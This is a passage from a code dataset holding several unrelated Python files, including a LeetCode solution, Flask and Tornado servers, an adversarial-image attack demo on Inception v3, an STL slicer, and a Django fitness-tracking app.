]\n","sub_path":"apps/account/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"118199686","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\n\n'''\nDid it run on leetcode: yes\nDid you face any problem: How to add new element into heap after we add it our sorted list\n\nTime Complexity: 0(N)\nSpace Complexity: 0(K)\n\nAlgorithm:\n- create a min heap which will contain all heads of the list's to be merged.\n- create a dummy head\n- while the queue is not empty:\n - get the minimum from heap and point dummy head to this minimum element\n - add the next element into the heap which is pointed by the popped element\n from the min heap\n- increment the dummy head to its next pointer\n- Now you have merged K sorted lists\n\n'''\n\nimport heapq\n\nclass Solution(object):\n def mergeKLists(self, lists):\n \"\"\"\n :type lists: List[ListNode]\n :rtype: ListNode\n \"\"\"\n heap = []\n \n for (index,listHead) in enumerate(lists):\n if listHead:\n heap.append((listHead.val,index))\n \n heapq.heapify(heap)\n head = ListNode(0)\n temp = head\n \n while heap:\n poppedHead,listIndex = heapq.heappop(heap)\n temp.next = lists[listIndex]\n temp = temp.next\n lists[listIndex] = lists[listIndex].next\n if lists[listIndex]:\n heapq.heappush(heap,(lists[listIndex].val,listIndex))\n \n return head.next","sub_path":"merge-k-sorted-lists.py","file_name":"merge-k-sorted-lists.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"514591148","text":"# import Flask class from the flask module\r\nfrom flask import Flask, request\r\n\r\nimport numpy as np\r\nimport pickle\r\nimport os\r\nimport sys\r\n\r\n# Create Flask object to run\r\napp = Flask(__name__)\r\n\r\n@app.route('/')\r\ndef home():\r\n return \"Hi, Welcome to zeno API , where Machine Learning models comes alive ^__^b \"\r\n\r\n@app.route('/predict')\r\ndef predict():\r\n # Get values from browser\r\n age = request.args['age']\r\n mp = request.args['menopause']\r\n tumor=request.args['tumor-size']\r\n inv=request.args['inv-nodes']\r\n caps=request.args['node-caps']\r\n deg=request.args['deg-malig']\r\n b=request.args['breast']\r\n bq=request.args['breast-quad']\r\n irr=request.args['irradiat']\r\n\r\n \r\n\r\n\t\r\n testData = np.array([age, mp,tumor, inv,caps, deg, b, bq,irr]).reshape(1,9)\r\n class_prediced = int(model.predict(testData)[0])\r\n output = \"age:{} ,menopause :{}, tumor_size:{}, inv_node:{},node_caps:{},deg_malig:{},breast:{},breast_quad:{}, irradiat:{} ,Predicted Class: {} \".format(str(age),str(mp), str(tumor), str(inv),str(caps),str(deg),str(b),str(bq),str(irr), str(class_prediced))\r\n\t\r\n return (output)\r\n\t\r\n# Load the pre-trained and persisted SVM model\r\n# Note: The model will be loaded only once at the start of the server\r\ndef load_model():\r\n global model\r\n\r\n modelFile = open('models/{}_model.pckl'.format(sys.argv[1]), 'rb')\r\n model = pickle.load(modelFile)\r\n modelFile.close()\r\n\r\nif __name__ == \"__main__\":\r\n print(\"**Starting Server...\")\r\n # http://127.0.0.1:5000/predict?age=1&menopause=7&tumor-size=3&inv-nodes=2&node-caps=10°-malig=5&breast=10&breast-quad=5&irradiat=\r\n # one need to supply which model you want to use since there are 6 models \r\n\r\n # Call function that loads Model\r\n load_model()\r\n\t\r\n # Run Server\r\n app.run()\r\n \r\n ","sub_path":"MachineLearningAPI_demoMaker/AZDL_models/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"493131451","text":"# -*- coding:UTF-8 -*-\n\nimport logging\n\nimport tornado.ioloop\nimport tornado.web\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\n\nfrom push import PushHandler\nfrom settings import SERVER_PORT\n\n_LOGGER = logging.getLogger('weixin')\n\napplication = tornado.web.Application([\n (r'/push', PushHandler),\n])\n\n\ndef serving():\n try:\n server = HTTPServer(application)\n server.bind(SERVER_PORT)\n server.start()\n IOLoop.current().start()\n _LOGGER.info('starting serving.')\n except KeyboardInterrupt:\n IOLoop.current().stop()\n except Exception as err:\n _LOGGER.error('starting failed, exception: %s' % err)\n\n\nif __name__ == '__main__':\n serving()\n","sub_path":"weixin/src/serving.py","file_name":"serving.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"464037541","text":"from pprint import pprint\nimport sounddevice as SD\nimport numpy as np\n\nclass Packet:\n class freqs:\n start = 5000\n zero = 6000\n one = 7000\n end = 8000\n\n def __init__(self, sample_rate=44100, window_size=2**15):\n self.sound = np.array([])\n self.sample_rate = sample_rate\n self.window_size = window_size\n\n \n def multiply_block(self, block, n):\n out = np.array([])\n for _ in range(n):\n out = np.concatenate((out, block))\n return out\n\n\n def get_block(self, freq):\n return np.array([\n np.sin(np.pi * 2 * x * freq / self.sample_rate) for x in range(self.window_size)\n ])\n\n\n def get_blocks(self, freq, n):\n return self.multiply_block(self.get_block(freq), n)\n\n\n def add_one(self):\n self.sound = np.concatenate((self.sound, self.get_block(self.freqs.one)))\n return self\n \n\n def add_zero(self):\n self.sound = np.concatenate((self.sound, self.get_block(self.freqs.zero)))\n return self\n \n def reset(self):\n self.sound = self.get_blocks(self.freqs.start, 8)\n return self\n\n\n def end(self):\n self.sound = np.concatenate((self.sound, self.get_blocks(self.freqs.end, 8)))\n return self\n\n\n def add_byte(self, byte):\n bits = list(map(int, ('00000000' + bin(byte)[2:])[-8:]))\n for bit in bits:\n if bit:\n self.add_one()\n else:\n self.add_zero()\n return self\n\n \n def play(self):\n SD.play(self.sound, self.sample_rate, blocking=True)\n return self\n\n def send_message(self, message):\n self.reset()\n for char in message:\n self.add_byte(ord(char))\n self.end().play()\n\n\nif __name__ == \"__main__\":\n p = Packet().reset()\n p.add_byte(0b11011011)\n p.add_byte(0b10011001)\n p.end().play()\n\n p.send_message(\"hello\")\n\n\n","sub_path":"remake.py","file_name":"remake.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"119722981","text":"import os\nimport shutil\nimport platform\nimport pype.lib\nfrom pype.api import Anatomy, Logger\nimport getpass\nimport avalon.api\n\n\nclass TvpaintPrelaunchHook(pype.lib.PypeHook):\n \"\"\"\n Workfile preparation hook\n \"\"\"\n host_name = \"tvpaint\"\n\n def __init__(self, logger=None):\n if not logger:\n self.log = Logger().get_logger(self.__class__.__name__)\n else:\n self.log = logger\n\n self.signature = \"( {} )\".format(self.__class__.__name__)\n\n def install_pywin(self):\n if platform.system().lower() != \"windows\":\n return\n\n try:\n from win32com.shell import shell\n except Exception:\n output = pype.lib._subprocess([\"pip\", \"install\", \"pywin32==227\"])\n self.log.info(output)\n\n def execute(self, *args, env: dict = None) -> bool:\n if not env:\n env = os.environ\n\n self.install_pywin()\n\n # get context variables\n project_name = env[\"AVALON_PROJECT\"]\n asset_name = env[\"AVALON_ASSET\"]\n task_name = env[\"AVALON_TASK\"]\n workdir = env[\"AVALON_WORKDIR\"]\n extension = avalon.api.HOST_WORKFILE_EXTENSIONS[self.host_name][0]\n\n # get workfile path\n workfile_path = self.get_anatomy_filled(\n workdir, project_name, asset_name, task_name)\n\n # create workdir if doesn't exist\n os.makedirs(workdir, exist_ok=True)\n self.log.info(f\"Work dir is: `{workdir}`\")\n\n # get last version of workfile\n workfile_last = env.get(\"AVALON_LAST_WORKFILE\")\n self.log.debug(f\"_ workfile_last: `{workfile_last}`\")\n\n if workfile_last:\n workfile = workfile_last\n workfile_path = os.path.join(workdir, workfile)\n\n # copy workfile from template if doesnt exist any on path\n if not os.path.isfile(workfile_path):\n # try to get path from environment or use default\n # from `pype.hosts.tvpaint` dir\n template_path = env.get(\"TVPAINT_TEMPLATE\") or os.path.join(\n env.get(\"PYPE_MODULE_ROOT\"),\n \"pype/hosts/tvpaint/template.tvpp\"\n )\n\n # try to get template from project config folder\n proj_config_path = os.path.join(\n env[\"PYPE_PROJECT_CONFIGS\"], project_name)\n if os.path.exists(proj_config_path):\n\n template_file = None\n for f in os.listdir(proj_config_path):\n if extension in os.path.splitext(f):\n template_file = f\n\n if template_file:\n template_path = os.path.join(\n proj_config_path, template_file)\n self.log.info(\n f\"Creating workfile from template: `{template_path}`\")\n\n # copy template to new destinantion\n shutil.copy2(\n os.path.normpath(template_path),\n os.path.normpath(workfile_path)\n )\n\n self.log.info(f\"Workfile to open: `{workfile_path}`\")\n\n # adding compulsory environment var for openting file\n env[\"PYPE_TVPAINT_PROJECT_FILE\"] = workfile_path\n\n return True\n\n def get_anatomy_filled(self, workdir, project_name, asset_name, task_name):\n dbcon = avalon.api.AvalonMongoDB()\n dbcon.install()\n dbcon.Session[\"AVALON_PROJECT\"] = project_name\n project_document = dbcon.find_one({\"type\": \"project\"})\n asset_document = dbcon.find_one({\n \"type\": \"asset\",\n \"name\": asset_name\n })\n dbcon.uninstall()\n\n asset_doc_parents = asset_document[\"data\"].get(\"parents\")\n hierarchy = \"/\".join(asset_doc_parents)\n\n data = {\n \"project\": {\n \"name\": project_document[\"name\"],\n \"code\": project_document[\"data\"].get(\"code\")\n },\n \"task\": task_name,\n \"asset\": asset_name,\n \"app\": self.host_name,\n \"hierarchy\": hierarchy\n }\n anatomy = Anatomy(project_name)\n extensions = avalon.api.HOST_WORKFILE_EXTENSIONS[self.host_name]\n file_template = anatomy.templates[\"work\"][\"file\"]\n data.update({\n \"version\": 1,\n \"user\": os.environ.get(\"PYPE_USERNAME\") or getpass.getuser(),\n \"ext\": extensions[0]\n })\n\n return avalon.api.last_workfile(\n workdir, file_template, data, extensions, True\n )\n","sub_path":"pype/hooks/tvpaint/prelaunch.py","file_name":"prelaunch.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"422866639","text":"import numpy as np\nimport tensorflow as tf\nimport time\n\ninput_data = tf.Variable( np.random.rand(1,2000,2000,1), dtype = np.float32 )\nfilter_data = tf.Variable( np.random.rand(8, 8, 1, 8), dtype = np.float32)\ny = tf.nn.conv2d(input_data, filter_data, strides = [1, 1, 1, 1], padding = 'SAME')\n\nwith tf.Session() as sess:\n #result = sess.run(op)#run operation\n sess.run(tf.global_variables_initializer())\n\n for i in range(0,100):\n start = time.perf_counter()\n sess.run(y)\n\n end = time.perf_counter()\n elapsed = end - start\n print(\"elapsed time = {:.12f} seconds\".format(elapsed))\n\n ","sub_path":"ILBPDll/TimeTestOfConv2D/TestConv2d.py","file_name":"TestConv2d.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"192114307","text":"from erebus import client\n\n\nclass Behavior(client.Behavior):\n TURN_SPEED = 3 # rad/s\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def tick(self, sensorData, commands):\n print('Distance reading: {}cm'.format(sensorData.getDistanceSensorReading('so3')))\n print('Encoder reading: {}rad'.format(sensorData.getPositionSensorReading('left wheel sensor')))\n if (sensorData.getTimestamp() % 2) > 1:\n commands.setMotor('left wheel', +self.TURN_SPEED)\n commands.setMotor('right wheel', -self.TURN_SPEED)\n else:\n commands.setMotor('left wheel', -self.TURN_SPEED)\n commands.setMotor('right wheel', +self.TURN_SPEED)\n\n\nif __name__ == '__main__':\n client.Client(Behavior, 'ExampleController').run()\n","sub_path":"client/python/examples/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"127992674","text":"# coding=utf-8\nimport torch\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.autograd.gradcheck import zero_gradients\nfrom torch.utils.data import Dataset, DataLoader\n\nimport torchvision.transforms as T\nfrom torchvision.models.inception import inception_v3\n\nfrom PIL import Image\nfrom scipy.misc import imsave\n\nimport matplotlib.pyplot as plt\nimport os\nimport numpy as np\n\nimport cv2\n\nclasses = eval(open('classes.txt').read())\ntrans = T.Compose([T.ToTensor(), T.Lambda(lambda t: t.unsqueeze(0))])\nreverse_trans = lambda x: np.asarray(T.ToPILImage()(x))\n\neps = 2 * 8 / 225.\nsteps = 20\nnorm = float('inf')\nstep_alpha = 0.01\n\nmodel = inception_v3(pretrained=True, transform_input=True)\nloss = nn.CrossEntropyLoss()\nmodel.eval()\n\n\ndef load_image(img_path):\n img = trans(Image.open(img_path).convert('RGB'))\n return img\n\n\ndef get_class(img):\n x = Variable(img, volatile=True)\n cls = model(x).data.max(1)[1].cpu().numpy()[0]\n return classes[cls]\n\n\ndef draw_result(img, noise, adv_img, blur_img):\n fig, ax = plt.subplots(1, 4, figsize=(15, 10))\n orig_class, attack_class = get_class(img), get_class(adv_img)\n blur_img_tensor=trans(blur_img)\n blur_class = get_class(blur_img_tensor)\n ax[0].imshow(reverse_trans(img[0]))\n ax[0].set_title('Original image: {}'.format(orig_class.split(',')[0]))\n ax[1].imshow(noise[0].cpu().numpy().transpose(1, 2, 0))\n ax[1].set_title('Attacking noise')\n ax[2].imshow(reverse_trans(adv_img[0]))\n ax[2].set_title('Adversarial example: {}'.format(attack_class))\n ax[3].imshow(reverse_trans(blur_img_tensor[0]))\n ax[3].set_title('blur_img:{}'.format(blur_class))\n for i in range(4):\n ax[i].set_axis_off()\n plt.tight_layout()\n plt.show()\n\n\ndef non_targeted_attack(img):\n img = img\n label = torch.zeros(1, 1)\n\n x, y = Variable(img, requires_grad=True), Variable(label)\n for step in range(steps):\n zero_gradients(x)\n out = model(x)\n y.data = out.data.max(1)[1]\n _loss = loss(out, y)\n _loss.backward()\n normed_grad = step_alpha * torch.sign(x.grad.data)\n step_adv = x.data + normed_grad\n adv = step_adv - img\n adv = torch.clamp(adv, -eps, eps)\n result = img + adv\n result = torch.clamp(result, 0.0, 1.0)\n x.data = result\n return result.cpu(), adv.cpu()\n\n\n# img = load_image('input.png')\n# adv_img, noise = non_targeted_attack(img)\n# draw_result(img, noise, adv_img)\n\n\ndef targeted_attack(img, label):\n img = img\n label = torch.Tensor([label]).long()\n\n x, y = Variable(img, requires_grad=True), Variable(label)\n for step in range(steps):\n zero_gradients(x)\n out = model(x)\n _loss = loss(out, y)\n _loss.backward()\n normed_grad = step_alpha * torch.sign(x.grad.data)\n step_adv = x.data - normed_grad\n adv = step_adv - img\n adv = torch.clamp(adv, -eps, eps)\n result = img + adv\n result = torch.clamp(result, 0.0, 1.0)\n x.data = result\n return result.cpu(), adv.cpu()\n\n\ndef blur(image):\n out = cv2.bilateralFilter(image, 9, 75, 75)\n return out\n\nimport numpy\nimg = load_image('input.png')\n# adv_img, noise = targeted_attack(img, 150)\nadv_img, noise = non_targeted_attack(img)\n\nadv_img_PIL = reverse_trans(adv_img[0])\n\nadv_img_CV2 = cv2.cvtColor(numpy.asarray(adv_img_PIL),cv2.COLOR_RGB2BGR)\n\nblur_out_CV2 = blur(adv_img_CV2)\n\n\nblur_out_PIL = Image.fromarray(cv2.cvtColor(blur_out_CV2,cv2.COLOR_BGR2RGB))\n\n# cv2.imshow(\"adv_img\",adv_img_CV2)\n# cv2.imshow(\"blur_out\",blur_out_CV2)\n# cv2.waitKey()\ndraw_result(img, noise, adv_img, blur_out_PIL)\n","sub_path":"1/fff.py","file_name":"fff.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"346604924","text":"#!/usr/bin/env python3\r\n\r\nimport math\r\nimport stl\r\nfrom stl import mesh\r\nimport numpy\r\nimport PIL.ImageDraw as ImageDraw\r\nimport PIL.Image as Image\r\nfrom shapely import geometry\r\n\r\n\r\n# THIS SECTION CAN BE MODIFIED MANUALLY BY THE USER ########################\r\n\r\n# importing ths stl file\r\nyour_mesh = mesh.Mesh.from_file('box.stl')\r\nthickness = 1\r\n\r\n# END OF THE SECTION ##############################################\r\n\r\n\r\n# calculating the triangle number in the stl file\r\ntriangle_tuple = your_mesh.points.shape\r\ntriangle_list = list(triangle_tuple)\r\ntriangle_number = triangle_list[0]\r\n\r\n# converting \"numpy nd.array\" type into \"list\" type\r\nbig_list = []\r\nfor k in range(triangle_number):\r\n \r\n b = list(your_mesh[k,:])\r\n big_list = big_list + [b]\r\n \r\n\r\n\r\n# find the max dimensions, so we can know the bounding box, getting the height,\r\n# width, length (because these are the step size)...\r\nminx = maxx = miny = maxy = minz = maxz = None\r\nfor p in your_mesh.points:\r\n # p contains (x, y, z)\r\n if minx is None:\r\n minx = p[stl.Dimension.X]\r\n maxx = p[stl.Dimension.X]\r\n miny = p[stl.Dimension.Y]\r\n maxy = p[stl.Dimension.Y]\r\n minz = p[stl.Dimension.Z]\r\n maxz = p[stl.Dimension.Z]\r\n else:\r\n maxx = max(p[stl.Dimension.X], maxx)\r\n minx = min(p[stl.Dimension.X], minx)\r\n maxy = max(p[stl.Dimension.Y], maxy)\r\n miny = min(p[stl.Dimension.Y], miny)\r\n maxz = max(p[stl.Dimension.Z], maxz)\r\n minz = min(p[stl.Dimension.Z], minz)\r\n\r\n\r\nz_maxx = maxz\r\nz_minn = minz\r\n\r\n# they had to be converted into integer to be used in loops\r\nz_max = int(z_maxx)\r\nz_min = int(z_minn)\r\n\r\n\r\n\r\nmain_list = []\r\n\r\n\r\n\r\n\r\n\r\n\r\ndef slicer(z_val):\r\n # in a specified layer, goes through all the vertices triangle by triangle, see if any of the vertices intersect the cutting plane\r\n # If a vertice intersects the cutting plane, by knowing the z value, x and y coordinates are obtained and appended to the vertices list\r\n # Then those vertices will be connected through a line and the contour will be obtained\r\n # All 5 of the scenarios are gone through and proper one is selected\r\n case = 0\r\n x_y_val = []\r\n cutting_ver = []\r\n sc4_list = []\r\n add_triangle = []\r\n val = 0\r\n for i in big_list:\r\n z_com = [i[2], i[5], i[8]] # a list of z coordinates of the 3 points of the triangle\r\n \r\n \r\n #scenario1:\r\n # no intersection found\r\n if (z_com[0] > z_val and z_com[1] > z_val and z_com[2] > z_val) or \\\r\n (z_com[0] < z_val and z_com[1] < z_val and z_com[2] < z_val): \r\n pass\r\n \r\n \r\n \r\n \r\n #scenario2:\r\n # only one of the vertices intersects with the cutting plane\r\n elif (z_com[0] == z_val and z_com[1] != z_val and z_com[2] != z_val) or \\\r\n (z_com[0] != z_val and z_com[1] == z_val and z_com[2] != z_val) or \\\r\n (z_com[0] != z_val and z_com[1] != z_val and z_com[2] == z_val): \r\n pass\r\n \r\n \r\n \r\n #scenario3:\r\n # 2 vertices on the cutting plane. So intersection is a full line. But at the moment we only store the vertices of the line\r\n # \r\n elif (z_com[0] == z_val and z_com[1] == z_val and z_com[2] != z_val ) or (z_com[0] == z_val and z_com[2] == z_val and z_com[1] != z_val) or (z_com[2] == z_val and z_com[1] == z_val and z_com[0] != z_val):\r\n if z_com[0] == z_val and z_com[1] == z_val and z_com[2] != z_val:\r\n var = 3\r\n\r\n elif z_com[0] == z_val and z_com[2] == z_val and z_com[1] != z_val:\r\n var = 2\r\n\r\n else:\r\n var = 1\r\n\r\n z_list = [0,1,2]\r\n new_z_list = z_list\r\n new_z_list.remove(var - 1)\r\n x_y_val.extend((i[new_z_list[0]*3], i[new_z_list[0]*3+1], i[new_z_list[1]*3], i[new_z_list[1]*3+1])) \r\n\r\n\r\n \r\n #scenario4:\r\n # all 3 vertices are on the cutting plane\r\n elif (z_com[0] == z_val and z_com[1] == z_val and z_com[2] == z_val):\r\n pass \r\n\r\n\r\n #scenario5:\r\n ### the detailed exlanation is made in the report with a flow chart and mathemitacal model\r\n \r\n elif (z_com[0] > z_val and z_com[1] < z_val and z_com[2] < z_val) or \\\r\n (z_com[0] < z_val and z_com[1] > z_val and z_com[2] < z_val) or \\\r\n (z_com[0] < z_val and z_com[1] < z_val and z_com[2] > z_val) or \\\r\n (z_com[0] < z_val and z_com[1] > z_val and z_com[2] > z_val) or \\\r\n (z_com[0] > z_val and z_com[1] < z_val and z_com[2] > z_val) or \\\r\n (z_com[0] > z_val and z_com[1] > z_val and z_com[2] < z_val): \r\n \r\n # a new list of the same z coordinates\r\n z_com_new = z_com\r\n # z value of the cutting plane is subrtracted from the each z coordinate, to find out which points will be above the plane\r\n # and which will be below the blane\r\n z_com_new = [ j - z_val for j in z_com_new ] \r\n \r\n # a new list created, and then filled with the positive values(z coordinates over the cutting plance) \r\n pos_neg = []\r\n pos_neg[:] =[x > 0 for x in z_com_new]\r\n \r\n \r\n spn = sum(pos_neg)\r\n \r\n \r\n \r\n if spn == 1:\r\n \r\n single_point_index = pos_neg.index(True)\r\n case = 1 \r\n \r\n \r\n else:\r\n single_point_index = pos_neg.index(False)\r\n case = 2 \r\n \r\n \r\n dummy_list = [0,1,2]\r\n other_dummy_list =dummy_list\r\n other_dummy_list.remove(single_point_index)\r\n \r\n # x, y and z coordinates of the point that is singly above/below the plane\r\n x_1 = i[single_point_index*3]\r\n y_1 = i[single_point_index*3+1]\r\n z_1 = i[single_point_index*3+2]\r\n \r\n # x, y and z coordinates of the other points\r\n x_2 = i[other_dummy_list[0]*3]\r\n y_2 = i[other_dummy_list[0]*3+1]\r\n z_2 = i[other_dummy_list[0]*3+2]\r\n \r\n x_3 = i[other_dummy_list[1]*3]\r\n y_3 = i[other_dummy_list[1]*3+1]\r\n z_3 = i[other_dummy_list[1]*3+2]\r\n \r\n \r\n \r\n # x and y coordinates of the tail and head of the lines\r\n\r\n if case == 1:\r\n\r\n if x_1 == x_2:\r\n x_n_1 = x_1 \r\n else:\r\n x_n_1 = (x_1 - x_2)*(z_val - z_2)/(z_1 - z_2)\r\n if x_n_1 < 0:\r\n x_n_1 = x_n_1 + max(x_2,x_3)\r\n\r\n if y_1 == y_2:\r\n y_n_1 = y_2\r\n else:\r\n y_n_1 = (y_1 - y_2)*(z_val - z_2)/(z_1 - z_2)\r\n if y_n_1 < 0:\r\n y_n_1 = y_n_1 + max(y_2,y_3)\r\n \r\n if x_1 == x_3:\r\n x_n_2 = x_1\r\n else:\r\n x_n_2 = (x_1 - x_3)*(z_val - z_3)/(z_1 - z_3)\r\n if x_n_2 < 0:\r\n x_n_2 = x_n_2 + max(x_3,x_2)\r\n \r\n if y_1 == y_3:\r\n y_n_2 = y_1\r\n else:\r\n y_n_2 = (y_1 - y_3)*(z_val - z_3)/(z_1 - z_3)\r\n if y_n_2 < 0:\r\n y_n_2 = y_n_2 + max(y_3,y_2)\r\n \r\n elif case==2:\r\n if x_1 == x_2:\r\n x_n_1 = x_1 \r\n else: \r\n x_n_1 = (x_2 - x_1)*(z_val - z_1)/(z_2 - z_1)\r\n if x_n_1 < 0:\r\n x_n_1 = x_n_1 + max(x_2,x_3)\r\n\r\n if y_1 == y_2:\r\n y_n_1 = y_2\r\n else:\r\n y_n_1 = (y_2 - y_1)*(z_val - z_1)/(z_2 - z_1)\r\n if y_n_1 < 0:\r\n y_n_1 = y_n_1 + max(y_2,y_3)\r\n \r\n if x_1 == x_3:\r\n x_n_2 = x_1\r\n else:\r\n x_n_2 = (x_3 - x_1)*(z_val - z_1)/(z_3 - z_1)\r\n if x_n_2 < 0:\r\n x_n_2 = x_n_2 + max(x_3,x_2)\r\n\r\n if y_1 == y_3:\r\n y_n_2 = y_1\r\n else:\r\n y_n_2 = (y_3 - y_1)*(z_val - z_1)/(z_3 - z_1)\r\n if y_n_2 < 0:\r\n y_n_2 = y_n_2 + max(y_3,y_2) \r\n \r\n \r\n \r\n \r\n \r\n n_1 = [x_n_1, y_n_1]\r\n n_2 = [x_n_2, y_n_2] \r\n \r\n \r\n x_y_val.extend((x_n_1, y_n_1,x_n_2, y_n_2))\r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n return x_y_val\r\n\r\n# as \"for\" can't loop with float values, the following correction is done, by normalizing z_max and z_min over thickness, so that the increment for the following for loop is 1\r\nthickness_correction = 1 / thickness\r\nz_min_correction = int( z_min * thickness_correction)\r\nz_max_correction = int(z_max * thickness_correction)\r\nz_val = 0\r\n\r\n# for each z value of the intersecting place, which varies with respect to thickness, slicer function is called, and the result is added to the list \"main_list\" \r\nfor range_var in range(z_min_correction, z_max_correction+1, 1): \r\n \r\n main_list = main_list + [slicer(z_val)] \r\n z_val = z_val + thickness\r\n\r\nprint(main_list,\"main_list\")\r\n\r\n\r\n \r\n \r\n \r\n################################################\r\n\r\n\r\n# we are also at the edge of finishing the converting of the file into bmp format by using a package, which contains also variables for resolution, but then we had some problems\r\n# by plotting the file perfectly, thus that part will be demonstrated in the final report.\r\n\r\n\r\n\r\n\r\n","sub_path":"3d_project.py","file_name":"3d_project.py","file_ext":"py","file_size_in_byte":10222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"584748245","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse, JsonResponse\nfrom django.contrib import messages\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import authenticate, login, logout\n\nfrom .models import *\nfrom .forms import *\nfrom django.db.models import Sum\nfrom django.db.models import Q\n\nimport os\nimport sys\nfrom datetime import date\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('/oma-sivuni')\n else:\n form = SignUpForm()\n return render(request, 'signup.html', {'form': form})\n\n@login_required\ndef allJson(request):\n labels = []\n data = []\n\n durationPerExercise = Exercise.objects.values('exercise').annotate(Sum('duration'))\n\n for e in durationPerExercise:\n labels.append(e['exercise'])\n data.append(e['duration__sum'])\n\n if len(data) > 0:\n data, labels = zip(*sorted(zip(data, labels)))\n\n return JsonResponse(data={\n 'labels': labels,\n 'data': data,\n })\n\n@login_required\ndef myJson(request):\n exercisesInAll = []\n durationsInAll = []\n datesInAll = []\n\n minutes = []\n dates = []\n\n durations = []\n exercises = []\n\n allExercises = Exercise.objects.filter(person__pk=request.user.pk)\n durationPerExercise = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(person__pk=request.user.pk)\n durationAllExercises = Exercise.objects.filter(person__pk=request.user.pk).aggregate(Sum('duration'))\n minutesInDay = Exercise.objects.values('date').annotate(Sum('duration')).filter(person__pk=request.user.pk)\n\n for e in allExercises:\n exercisesInAll.append(e.exercise)\n durationsInAll.append(e.duration)\n datesInAll.append(e.date)\n\n for i in minutesInDay:\n dates.append(i['date'])\n minutes.append(i['duration__sum'])\n \n for e in durationPerExercise:\n exercises.append(e['exercise'])\n durations.append(e['duration__sum'])\n \n return JsonResponse(data={\n 'all': {\n 'exercises': exercisesInAll,\n 'durations': durationsInAll,\n 'dates': datesInAll,\n },\n 'minutesInDay': {\n 'minutes': minutes,\n 'dates': dates,\n },\n 'durationPerExercise': {\n 'exercises': exercises,\n 'durations': durations,\n },\n \n })\n \ndef charts(request):\n return render(request, 'charts.html')\n\ndef start(request):\n return render(request, 'start.html')\n\ndef loggingIn(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(request, username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('/oma-sivuni')\n else:\n messages.error(request, 'Käyttäjänimeä ei löydy tai salasana on virheellinen. Yritä uudestaan!')\n return redirect('/kirjaudu')\n\n@login_required\ndef removeChallenge(request, challenge_id):\n if Challenge.objects.filter(id=challenge_id).exists():\n challenge = Challenge.objects.get(id=challenge_id)\n challenge.delete()\n messages.info(request, 'Haaste poistettiin!')\n return redirect('/oma-sivuni')\n\ndef logout(request):\n logout(request)\n # Redirect to a success page.\n return redirect('/')\n\n@login_required\ndef myPage(request):\n #haetaan haasteet, joissa käyttäjä on osallisena\n challenges = Challenge.objects.filter(challengedBy__pk=request.user.pk) | Challenge.objects.filter(personChallenged__pk=request.user.pk) \n if len(challenges) > 0:\n messages.info(request, 'Sinulla on käynnissä olevia haasteita!')\n\n #progression-taulukoissa haasteet kirjasto-kokoelmina, joissa avaimina haasteen id,\n #haasteeseen vastaavien harjoitusten kestojen summa sekä kuinka paljon haasteesta on vielä tekemättä\n progression = [] \n progressionOther = []\n exercisesOther = []\n employerChallenge = None\n #haetaan voimassa oleva työnantajan haaste:\n if EmployerChallenge.objects.filter(dateFrom__lte=date.today(), dateTo__gte=date.today()).exists():\n #lisätään progression-taulukkoon tieto edistymisestä työnantajan haasteen parissa:\n employerChallenge = EmployerChallenge.objects.get(dateFrom__lte=date.today(), dateTo__gte=date.today())\n progressionWithEmployerChallenge = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(exercise=employerChallenge.exercise, date__gte=employerChallenge.dateFrom, date__lte=employerChallenge.dateTo, person__pk=request.user.pk)\n if len(progressionWithEmployerChallenge) > 0:\n progression.append({'challenge_id': 'employer-challenge', 'done': progressionWithEmployerChallenge[0]['duration__sum'], 'to_do': employerChallenge.duration - progressionWithEmployerChallenge[0]['duration__sum'] })\n if progressionWithEmployerChallenge[0]['duration__sum']>=employerChallenge.duration and not Completer.objects.filter(person=request.user).exists():\n messages.success(request, 'Onneksi olkoon! Olet täyttänyt työnantajan asettaman haasteen! Palkintosi on {}!'.format(employerChallenge.carrot))\n completer = Completer(person=request.user)\n completer.save()\n employerChallenge.completers.add(completer)\n\n for c in challenges:\n #lasketaan omien tähän haasteeseen vastaavien harjoitusten kestot yhteen:\n exercisesOwn = Exercise.objects.values('exercise').annotate(Sum('duration')).filter(exercise=c.exercise, date__gte=c.dateFrom, date__lte=c.dateTo, person__pk=request.user.pk)\n if c.challengedBy.pk == 